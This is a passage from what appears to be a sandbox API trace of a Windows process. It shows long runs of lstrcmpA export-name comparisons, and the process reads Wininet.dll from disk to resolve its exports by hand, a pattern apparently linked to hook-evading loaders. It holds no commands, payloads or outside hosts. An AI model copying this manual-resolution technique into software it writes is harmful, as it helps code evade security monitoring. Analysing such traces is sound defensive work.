lpString2="AddRefActCtx") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.418] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0276.419] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0276.419] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0276.419] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0276.419] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0276.420] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0276.420] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0276.420] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0276.420] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0276.421] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0276.421] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0276.421] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0276.422] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0276.422] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0276.422] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0276.423] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0276.423] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0276.424] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0276.425] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0277.537] GetProcessHeap () returned 0x540000 [0277.537] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56c5f0 | out: hHeap=0x540000) returned 1 [0277.654] GetProcessHeap () returned 0x540000 [0277.654] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x5590a0 [0277.654] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0277.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0277.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0277.667] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0277.667] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0277.667] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0277.667] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0277.667] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0277.667] GetProcessHeap () returned 0x540000 [0277.668] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x286600) returned 0x4102040 [0277.675] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0277.675] ReadFile (in: hFile=0x140, lpBuffer=0x4102040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4102040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0278.028] CloseHandle (hObject=0x140) returned 1 [0278.028] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0278.028] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0278.028] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0278.028] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0278.028] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0278.028] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0278.029] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0278.030] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0278.031] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.032] lstrcmpA 